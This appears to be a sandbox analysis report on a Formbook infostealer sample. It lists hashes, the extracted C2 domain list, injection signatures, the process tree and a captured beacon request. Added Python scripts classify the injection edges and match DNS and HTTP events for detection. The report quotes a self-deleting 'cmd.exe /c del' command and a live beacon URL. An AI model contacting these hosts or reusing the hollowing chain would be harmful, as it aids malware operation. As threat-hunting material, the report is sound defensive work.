Analysis

max time kernel: 148s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted: 22-12-2024 04:52

Static task: static1
Behavioral task: behavioral1
Sample: skmbt ref 10072022.exe
Resource: win7-20240903-en
General

Target: skmbt ref 10072022.exe
Size: 933KB
MD5: dc681c0d1b1a68760efaa3d0e30c265c
SHA1: b9af8e985e07a8ca11a5b81e7353428015c824ad
SHA256: 866ff728d933b6a13b260cb79be66e9d17069f15fb7458673d313f6d7590864a
SHA512: fb1b39aba32987f6a84617870e5b3cfc9a6c54726979ad9608082b78135d91a35fd4c4ae7bd63f90c35e51d138c9d7952d93daef9ebc62f4dcbb880fd23d5de2
SSDEEP: 12288:wGrI2iNQxZU/LPBBmJw5afc8WBuSSVwwuizH+BllvMo3Y6J2u:wGs1gUjPBwwIWcSSSeze3d3Q
Malware Config

Extracted
Family: formbook
Version: 4.1
Campaign: a1n9
Domains (Formbook's configured domain list, most of which are decoys; four of these were queried during this analysis, see Network):
mundodasmaquininhas.net
smop2.info
xn--chriemonrve-cbbu.com
kalebet977.com
inmobiliarianb.com
watersmartaz.com
xyz.gallery
sadiztech.com
traiteur-albi.fr
blocks.icu
hangrypancreas.com
saysosoulcards.com
rightforearth.com
swifty.network
bettwsrfc.co.uk
bcausemarketing.com
thaibjbar.com
zurisfashion.store
optimisescreencleaner.com
couponsjoe.com
obatsakitkanker.com
steelandcements.com
genitorisicresce.com
wwwhx951.com
kalaimani.com
wholesaleknafeh.com
house-pr.com
cameronrusticdesign.com
guiadadieta.com
italianfeetjob.com
popupdocs.net
costretch4life.com
zwnvgz.com
athlete-exchange.net
interactspeechanddrama.com
corstorphinett.club
fearofmovingforward.com
thinkbracknell.com
haberindibi.com
liamx.com
guoranspace.net
lindaedwards-music.com
recurringrevenue.online
lfxindi.com
top-of-taxi.com
domagojvida.com
joulesjordan.com
cashflowsmoothing.com
masteren-marketing-digital1.com
quoternion.com
shedsofslidell.com
jfdxpctb.net
dropmwe.online
stay2stay.com
babymoko.com
medianalyst.com
mottiinvestments.com
ppctrends.com
cemepeng.com
villainmanikata.com
servibracional.com
listgi.com
oinknoodle.com
coms-en.icu
mireolife.com
Signatures

- Formbook family

- Formbook payload (3 IoCs)
  YARA rule "formbook" matched these memory dumps:
    behavioral2/memory/4032-14-0x0000000000400000-0x000000000042F000-memory.dmp
    behavioral2/memory/4032-19-0x0000000000400000-0x000000000042F000-memory.dmp
    behavioral2/memory/3560-24-0x0000000000350000-0x000000000037F000-memory.dmp

- Suspicious use of SetThreadContext (3 IoCs)
  source PID  process                  target PID  procid_target
  2380        skmbt ref 10072022.exe   4032        101
  4032        skmbt ref 10072022.exe   3508        56
  3560        wscript.exe              3508        56
  (PID 4032 is the third skmbt ref 10072022.exe child, PID 3508 is Explorer.EXE; see Processes)

- System Location Discovery: System Language Discovery (1 TTP, T1614.001; 3 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by skmbt ref 10072022.exe, wscript.exe and cmd.exe

- Suspicious behavior: EnumeratesProcesses (48 IoCs)
  2380 skmbt ref 10072022.exe (4 entries), 4032 skmbt ref 10072022.exe (4 entries), 3560 wscript.exe (40 entries)

- Suspicious behavior: MapViewOfSection (5 IoCs)
  4032 skmbt ref 10072022.exe (3 entries), 3560 wscript.exe (2 entries)

- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege, adjusted by 2380 skmbt ref 10072022.exe, 4032 skmbt ref 10072022.exe and 3560 wscript.exe

- Suspicious use of WriteProcessMemory (18 IoCs)
  source PID  process                  target PID  procid_target  entries
  2380        skmbt ref 10072022.exe   1768        99             3
  2380        skmbt ref 10072022.exe   4396        100            3
  2380        skmbt ref 10072022.exe   4032        101            6
  3508        Explorer.EXE             3560        102            3
  3560        wscript.exe              4348        103            3
Processes

C:\Windows\Explorer.EXE  (PID 3508)
  command line: C:\Windows\Explorer.EXE
  - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe  (PID 2380)
      command line: "C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe  (PID 1768)
          command line: "C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"

        C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe  (PID 4396)
          command line: "C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"

        C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe  (PID 4032)
          command line: "C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\wscript.exe  (PID 3560)
      command line: "C:\Windows\SysWOW64\wscript.exe"
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe  (PID 4348)
          command line: /c del "C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"
          - System Location Discovery: System Language Discovery
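The SetThreadContext, WriteProcessMemory and MapViewOfSection signatures above, read together with the process tree, describe the injection chain of this run: PID 2380 writes into its own child PID 4032 six times and then sets its thread context (process hollowing, which is why the "formbook" YARA rule fires at 0x400000 in PID 4032), PID 4032 then sets the thread context of Explorer.EXE (PID 3508) without any WriteProcessMemory logged from it but with MapViewOfSection logged, Explorer.EXE spawns wscript.exe (PID 3560), which repeats the section-mapping plus SetThreadContext step against Explorer.EXE and finally runs cmd.exe /c del to remove the dropper. The script below is an added example and not part of the sandbox report: it parses the report's flattened IoC lines (the process name contains spaces, so the parser anchors on the repeated source PID and the trailing procid_target) and classifies each source/target pair by the primitives seen on it. The SetThreadContext text is copied verbatim from the report; the WriteProcessMemory text is rebuilt from the report's counts, and the PID-to-image map comes from the Processes section.

```python
import re
from collections import Counter

# Process image names by PID, taken from the "Processes" tree in the report.
PROCESS_NAMES = {
    3508: "Explorer.EXE",
    2380: "skmbt ref 10072022.exe",
    1768: "skmbt ref 10072022.exe",
    4396: "skmbt ref 10072022.exe",
    4032: "skmbt ref 10072022.exe",
    3560: "wscript.exe",
    4348: "cmd.exe",
}

# IoC text as the sandbox flattens it: "PID <src> <op> <dst> <src> <process> <procid_target>",
# with entries run together on one line. SetThreadContext entries are verbatim from the
# report; WriteProcessMemory entries are rebuilt from the report's per-pair counts.
SET_THREAD_CONTEXT = (
    "PID 2380 set thread context of 4032 2380 skmbt ref 10072022.exe 101 "
    "PID 4032 set thread context of 3508 4032 skmbt ref 10072022.exe 56 "
    "PID 3560 set thread context of 3508 3560 wscript.exe 56"
)
WRITE_PROCESS_MEMORY = " ".join(
    ["PID 2380 wrote to memory of 1768 2380 skmbt ref 10072022.exe 99"] * 3
    + ["PID 2380 wrote to memory of 4396 2380 skmbt ref 10072022.exe 100"] * 3
    + ["PID 2380 wrote to memory of 4032 2380 skmbt ref 10072022.exe 101"] * 6
    + ["PID 3508 wrote to memory of 3560 3508 Explorer.EXE 102"] * 3
    + ["PID 3560 wrote to memory of 4348 3560 wscript.exe 103"] * 3
)
# MapViewOfSection entry counts per PID from the report; explains context-only edges.
MAP_VIEW_OF_SECTION = {4032: 3, 3560: 2}

# The process name may contain spaces, so anchor on the repeated source PID and on the
# trailing procid_target number, which is followed by the next "PID " or end of text.
IOC_RE = re.compile(
    r"PID (\d+) (set thread context of|wrote to memory of) (\d+) \1 (.*?) (\d+)(?= PID |$)"
)


def parse_iocs(text):
    """Return (src_pid, op, dst_pid, process, procid_target) tuples in report order."""
    return [
        (int(m.group(1)), m.group(2), int(m.group(3)), m.group(4), int(m.group(5)))
        for m in IOC_RE.finditer(text)
    ]


def classify(edges):
    """Group (src, dst) pairs by the primitives logged on them.

    hollowed:     WriteProcessMemory and SetThreadContext on the same pair (process hollowing).
    context_only: SetThreadContext with no WriteProcessMemory from that source; the payload
                  reached the target some other way (here MapViewOfSection is logged).
    write_only:   writes with no thread hijack (parent writes at process creation, or
                  hollowing attempts that went no further).
    """
    writes = Counter((s, d) for s, op, d, _, _ in edges if op == "wrote to memory of")
    ctx = {(s, d) for s, op, d, _, _ in edges if op == "set thread context of"}
    return {
        "hollowed": sorted(p for p in ctx if p in writes),
        "context_only": sorted(p for p in ctx if p not in writes),
        "write_only": sorted(p for p in writes if p not in ctx),
        "write_counts": dict(writes),
    }


def describe(report):
    """One readable line per edge, with image names and the primitive that carried the payload."""
    lines = []
    for s, d in report["hollowed"]:
        lines.append(f"{s} {PROCESS_NAMES[s]} -> {d} {PROCESS_NAMES[d]}: "
                     f"WriteProcessMemory x{report['write_counts'][(s, d)]} + SetThreadContext (process hollowing)")
    for s, d in report["context_only"]:
        how = (f"MapViewOfSection x{MAP_VIEW_OF_SECTION[s]}" if s in MAP_VIEW_OF_SECTION
               else "an unlogged primitive")
        lines.append(f"{s} {PROCESS_NAMES[s]} -> {d} {PROCESS_NAMES[d]}: "
                     f"SetThreadContext without WriteProcessMemory; payload delivered via {how}")
    for s, d in report["write_only"]:
        lines.append(f"{s} {PROCESS_NAMES[s]} -> {d} {PROCESS_NAMES[d]}: "
                     f"WriteProcessMemory x{report['write_counts'][(s, d)]} only")
    return lines


if __name__ == "__main__":
    for line in describe(classify(parse_iocs(SET_THREAD_CONTEXT + " " + WRITE_PROCESS_MEMORY))):
        print(line)
```

The classification is deliberately primitive-based rather than name-based: the two hops into Explorer.EXE would be missed by a rule that only looks for WriteProcessMemory followed by SetThreadContext, because the payload is mapped in as a section and only the thread hijack is visible from the injector. The write-only edges 2380 -> 1768 and 2380 -> 4396 match the two skmbt ref 10072022.exe children that show no further activity in the tree.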
Network

DNS (all queries sent to 8.8.8.8:53)
  241.150.49.20.in-addr.arpa     IN PTR   (empty response)
  22.49.80.91.in-addr.arpa       IN PTR   (empty response)
  95.221.229.192.in-addr.arpa    IN PTR   (empty response)
  23.159.190.20.in-addr.arpa     IN PTR   (empty response)
  232.168.11.51.in-addr.arpa     IN PTR   (empty response)
  228.249.119.40.in-addr.arpa    IN PTR   (empty response)
  197.87.175.4.in-addr.arpa      IN PTR   (empty response)
  241.42.69.40.in-addr.arpa      IN PTR   (empty response)
  24.139.73.23.in-addr.arpa      IN PTR   a23-73-139-24.deploy.static.akamaitechnologies.com
  83.210.23.2.in-addr.arpa       IN PTR   a2-23-210-83.deploy.static.akamaitechnologies.com
  www.joulesjordan.com           IN A     (empty response)
  19.229.111.52.in-addr.arpa     IN PTR   (empty response)
  www.wwwhx951.com               IN A     (empty response)
  www.blocks.icu                 IN A     CNAME blocks.icu; blocks.icu A 192.0.78.25, A 192.0.78.24
  25.78.0.192.in-addr.arpa       IN PTR   (empty response)
  www.jfdxpctb.net               IN A     (empty response)

HTTP (Explorer.EXE to 192.0.78.25:80)
  GET http://www.blocks.icu/a1n9/?hdmTv2MX=VnfuStwuEFmDOSc+Yd/5Q+XOchp2W1FFazlMVPqdlvFAXbFBI8/JuiFRMb1cq8/I2Qeh&BPJdfv=YV8tz6Q

  Request:
    GET /a1n9/?hdmTv2MX=VnfuStwuEFmDOSc+Yd/5Q+XOchp2W1FFazlMVPqdlvFAXbFBI8/JuiFRMb1cq8/I2Qeh&BPJdfv=YV8tz6Q HTTP/1.1
    Host: www.blocks.icu
    Connection: close

  Response:
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 22 Dec 2024 04:54:55 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: close
    Location: https://www.blocks.icu/a1n9/?hdmTv2MX=VnfuStwuEFmDOSc+Yd/5Q+XOchp2W1FFazlMVPqdlvFAXbFBI8/JuiFRMb1cq8/I2Qeh&BPJdfv=YV8tz6Q
    X-ac: 3.lhr _dfw BYPASS
    Alt-Svc: h3=":443"; ma=86400
Traffic summary

destination      proto  process       sent   recv   pkts (sent/recv)  request / response
192.0.78.25:80   http   Explorer.EXE  394 B  713 B  5/5               GET http://www.blocks.icu/a1n9/?hdmTv2MX=VnfuStwuEFmDOSc+Yd/5Q+XOchp2W1FFazlMVPqdlvFAXbFBI8/JuiFRMb1cq8/I2Qeh&BPJdfv=YV8tz6Q -> 301
8.8.8.8:53       dns                  72 B   158 B  1/1               241.150.49.20.in-addr.arpa
8.8.8.8:53       dns                  70 B   145 B  1/1               22.49.80.91.in-addr.arpa
8.8.8.8:53       dns                  73 B   144 B  1/1               95.221.229.192.in-addr.arpa
8.8.8.8:53       dns                  72 B   158 B  1/1               23.159.190.20.in-addr.arpa
8.8.8.8:53       dns                  72 B   158 B  1/1               232.168.11.51.in-addr.arpa
8.8.8.8:53       dns                  73 B   159 B  1/1               228.249.119.40.in-addr.arpa
8.8.8.8:53       dns                  71 B   157 B  1/1               197.87.175.4.in-addr.arpa
8.8.8.8:53       dns                  71 B   145 B  1/1               241.42.69.40.in-addr.arpa
8.8.8.8:53       dns                  71 B   135 B  1/1               24.139.73.23.in-addr.arpa
8.8.8.8:53       dns                  70 B   133 B  1/1               83.210.23.2.in-addr.arpa
8.8.8.8:53       dns                  66 B   139 B  1/1               www.joulesjordan.com
8.8.8.8:53       dns                  72 B   158 B  1/1               19.229.111.52.in-addr.arpa
8.8.8.8:53       dns                  62 B   135 B  1/1               www.wwwhx951.com
8.8.8.8:53       dns                  60 B   106 B  1/1               www.blocks.icu -> 192.0.78.25, 192.0.78.24
8.8.8.8:53       dns                  70 B   135 B  1/1               25.78.0.192.in-addr.arpa
8.8.8.8:53       dns                  62 B   135 B  1/1               www.jfdxpctb.net
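Three details in the network capture tie it back to the extracted config: the beacon is issued by Explorer.EXE (the process whose thread context PIDs 4032 and 3560 hijacked), its path /a1n9/ is the configured campaign id, and the four A-record lookups are config domains with "www." prepended (www.joulesjordan.com, www.wwwhx951.com, www.blocks.icu, www.jfdxpctb.net). Only www.blocks.icu resolved, and it answered with a 301 to HTTPS from 192.0.78.25 carrying an X-ac header, which is characteristic of WordPress.com (Automattic) hosting; the capture contains no follow-up request, so this run shows no successful check-in and blocks.icu should be treated as one entry of a mostly-decoy list rather than a confirmed panel. The matcher below is an added example, not the report's or Formbook's own code: it embeds the config domains and campaign id from this report, strips the "www." label for DNS matching, and tests HTTP URLs against the URI shape seen here. The shape heuristic (path equal to "/<campaign>/", exactly two query parameters with alphanumeric names, a first value of at least 40 base64 characters) is my generalization from the single request in this report, not a rule taken from the report. Sample events are constructed from the report's DNS and HTTP rows.

```python
import re
from urllib.parse import urlsplit

# Formbook configuration as extracted in the report: version 4.1, campaign "a1n9",
# followed by the domain list, copied here so the matcher runs offline.
CAMPAIGN = "a1n9"
CONFIG_DOMAINS = frozenset("""
mundodasmaquininhas.net smop2.info xn--chriemonrve-cbbu.com kalebet977.com
inmobiliarianb.com watersmartaz.com xyz.gallery sadiztech.com traiteur-albi.fr
blocks.icu hangrypancreas.com saysosoulcards.com rightforearth.com swifty.network
bettwsrfc.co.uk bcausemarketing.com thaibjbar.com zurisfashion.store
optimisescreencleaner.com couponsjoe.com obatsakitkanker.com steelandcements.com
genitorisicresce.com wwwhx951.com kalaimani.com wholesaleknafeh.com house-pr.com
cameronrusticdesign.com guiadadieta.com italianfeetjob.com popupdocs.net
costretch4life.com zwnvgz.com athlete-exchange.net interactspeechanddrama.com
corstorphinett.club fearofmovingforward.com thinkbracknell.com haberindibi.com
liamx.com guoranspace.net lindaedwards-music.com recurringrevenue.online lfxindi.com
top-of-taxi.com domagojvida.com joulesjordan.com cashflowsmoothing.com
masteren-marketing-digital1.com quoternion.com shedsofslidell.com jfdxpctb.net
dropmwe.online stay2stay.com babymoko.com medianalyst.com mottiinvestments.com
ppctrends.com cemepeng.com villainmanikata.com servibracional.com listgi.com
oinknoodle.com coms-en.icu mireolife.com
""".split())

# The GET observed in the report, verbatim.
BEACON_URL = ("http://www.blocks.icu/a1n9/?hdmTv2MX=VnfuStwuEFmDOSc+Yd/5Q+XOchp2W1FFazlMVPqdlvFAXbFBI8"
              "/JuiFRMb1cq8/I2Qeh&BPJdfv=YV8tz6Q")

# Constructed sample of the report's network rows as (kind, value) pairs, in capture order.
SAMPLE_EVENTS = [
    ("dns", "241.150.49.20.in-addr.arpa"),
    ("dns", "24.139.73.23.in-addr.arpa"),
    ("dns", "www.joulesjordan.com"),
    ("dns", "19.229.111.52.in-addr.arpa"),
    ("dns", "www.wwwhx951.com"),
    ("dns", "www.blocks.icu"),
    ("http", BEACON_URL),
    ("dns", "25.78.0.192.in-addr.arpa"),
    ("dns", "www.jfdxpctb.net"),
]

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def config_domain(host):
    """Return the config entry a hostname corresponds to, or None.

    Formbook prepends "www." to the configured domain when it builds the request,
    so one leading "www." label is stripped before the lookup."""
    host = (host or "").lower().rstrip(".")
    if host in CONFIG_DOMAINS:
        return host
    if host.startswith("www.") and host[4:] in CONFIG_DOMAINS:
        return host[4:]
    return None


def is_formbook_beacon(url, campaign=CAMPAIGN):
    """Heuristic (my generalization from this report's single request): config host,
    path "/<campaign>/", exactly two query parameters, first value a long base64 blob."""
    parts = urlsplit(url)
    if config_domain(parts.hostname) is None or parts.path != f"/{campaign}/":
        return False
    # Do not use urllib.parse.parse_qs here: it decodes "+" as a space and would
    # corrupt the base64 blob (the observed value contains both "+" and "/").
    pairs = [p.split("=", 1) for p in parts.query.split("&") if p]
    if len(pairs) != 2 or any(len(p) != 2 for p in pairs):
        return False
    (k1, v1), (k2, v2) = pairs
    return (k1.isalnum() and k2.isalnum() and len(v1) >= 40
            and bool(B64_RE.match(v1)) and bool(B64_RE.match(v2)))


def scan(events):
    """Return (kind, value, matched_config_domain) for every event tied to the config."""
    hits = []
    for kind, value in events:
        if kind == "dns":
            d = config_domain(value)
            if d:
                hits.append((kind, value, d))
        elif kind == "http" and is_formbook_beacon(value):
            hits.append((kind, value, config_domain(urlsplit(value).hostname)))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The DNS side is the more useful of the two for hunting: the A-record queries for config domains happen whether or not the domain resolves, whereas the HTTP shape is only visible when a decoy or the real panel answers. Keep the parse_qs caveat in mind when porting this to a log pipeline; several query-string parsers apply form decoding by default and will silently break the base64 check.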